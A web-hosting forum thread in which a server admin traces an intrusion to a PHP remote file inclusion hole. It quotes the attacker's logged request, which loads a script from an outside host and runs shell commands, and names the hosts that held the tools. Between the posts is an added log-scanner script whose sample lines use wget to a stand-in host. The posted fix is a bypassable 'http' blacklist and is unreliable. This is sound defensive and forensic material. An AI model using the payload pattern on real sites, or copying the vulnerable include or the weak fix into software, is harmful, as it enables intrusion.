
Catching a Hacker

gromett
I am happy to say that since moving on to Plesk, attacks and attempts on my servers have been greatly reduced. The only ones I get now are the cross-server scripting ones. Currently I just monitor the /tmp and /var/tmp directories for suspicious files every minute, which lets me know when one is in progress. What follows is how I managed to track down how it happened so I could fix the client's dodgy script. I am posting this to help others who may not have the time or knowledge to do so.

1) I went to /var/tmp and moved all files to /root/hack for later perusal.
2) Did a ps aux to get the process IDs and file names of the scripts being run:
apache 29836 0.0 0.0 864 184 ttyp0 S 19:32 0:00 ./ssh-scan 100
These had been created by a shell called /.x
3) Did a netstat -lvanp to find out the remote IP of the attacker:
tcp 0 0 213.232.100.82:5500 222.124.31.12:4352 ESTABLISHED 7862/x
4) The hacker's IP is 222.124.31.12. Now to find out which script was responsible for the breach.
5) Used this find command to check all log files:
find /home/httpd/vhosts/ -name access_log -print -exec grep "195.93.21.100" {} \;
6) From this I could see the site name (modified):
cat /home/httpd/vhosts/thedomain.com/statistics/logs/access_log | grep "222.124.31.12" >/root/hack/access_log

Here is a sample log entry:
/eolaud.php?SiteRef=http://www.virama.com/net.txt?&cmd=cd%20/var/spool/samba;mkdir%20.ro HTTP/1.0" 200 9623 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"

The script is called eolaud.php.
I had a look at this script and it had one line of PHP code in it:
<?
include $SiteRef;
?>

You can see that by passing ?SiteRef=...... you could include a file or script from another site.

I changed this script to the following and notified the client:
<?
if (eregi("http",$SiteRef)) {
$SiteRef="";
}
include $SiteRef;
?>

If a remote address is now entered it blanks the variable.

In addition to this I have contacted the 4 hosts that were used by the hacker, including
http://geocities.com/evikhobare/dodol.txt
www.virama.com
the IP owner for the hacker, and the site where he had his hacking tools hosted.
Hopefully he will be shut down. I have offered all the forensic evidence to the providers if they want to bring the authorities in.

I am updating my checking scripts to include an hourly scan of all access_logs looking for /var/tmp and /tmp.

I hope this info helps.


Regards Karl
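The hourly access_log scan described in the post above, written out as an added example (not Karl's own checking script): it flags query parameters that carry a remote URL, the sign of the include $SiteRef problem, and any request that references /tmp or /var/tmp. The log lines, hostnames and IPs below are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format; hosts and IPs are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2006:19:32:01 +0000] "GET /eolaud.php?SiteRef=http://attacker.example/net.txt?&cmd=cd%20/var/tmp;wget%20http://attacker.example/x HTTP/1.0" 200 9623 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Mar/2006:19:33:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 1502 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2006:19:34:22 +0000] "GET /eolaud.php?SiteRef=%68%74%74%70://attacker.example/c.txt HTTP/1.0" 200 88 "-" "Mozilla/4.0"
"""

# client ip, method, request target and status from a combined-format line
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# a parameter value that is itself a remote URL (what include $SiteRef would fetch)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# the scratch directories the post's hourly scan looks for
TMP_PATH_RE = re.compile(r'/(?:var/)?tmp\b')


def analyse_line(line):
    """Return (client_ip, request_target, findings) or None if the line is clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _path, _, query = m.group('target').partition('?')
    findings = []
    for pair in query.split('&'):
        name, _, raw = pair.partition('=')
        # Decode twice so %25-double-encoded values are seen as well as %68%74%74%70 ones.
        value = unquote(unquote(raw))
        if REMOTE_URL_RE.match(value):
            findings.append((name, 'remote URL passed as parameter (possible remote include)'))
        if TMP_PATH_RE.search(value):
            findings.append((name, 'reference to /tmp or /var/tmp in request'))
    return (m.group('ip'), m.group('target'), findings) if findings else None


def scan_log(text):
    """Return {client_ip: [(request_target, findings), ...]} for suspicious requests only."""
    report = {}
    for line in text.splitlines():
        hit = analyse_line(line)
        if hit:
            ip, target, findings = hit
            report.setdefault(ip, []).append((target, findings))
    return report


if __name__ == '__main__':
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip)
        for target, findings in hits:
            print('   ', target)
            for name, reason in findings:
                print('        %s: %s' % (name, reason))
```

Run it against the real files with something like `cat /home/httpd/vhosts/*/statistics/logs/access_log | python3 scan.py` after replacing SAMPLE_LOG with sys.stdin.read(); the output groups offending requests by client IP, which is the value the post then grep'd for.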
 
Karl,

Congratulations with your "catch" and thanks for sharing this with us.

Just one extra question: when you say that you monitor /tmp and /var/tmp every minute, what are you actually doing and looking for?

Ingrid.
 
Thanks for sharing the info, Karl.

I had quite a similar attack and it filled up my bandwidth.

But now, instead of monitoring my /var/tmp and /tmp, I made a separate partition for /tmp and mounted it with noexec and nosuid.
I also changed the mode of wget, c**, gcc** to 600 (root-only access) and scanned through my home/httpd/vhost for unusual files, especially files owned by apache and world-writeable. When they were all gone, my server was normal again.

Regards
Lucky
 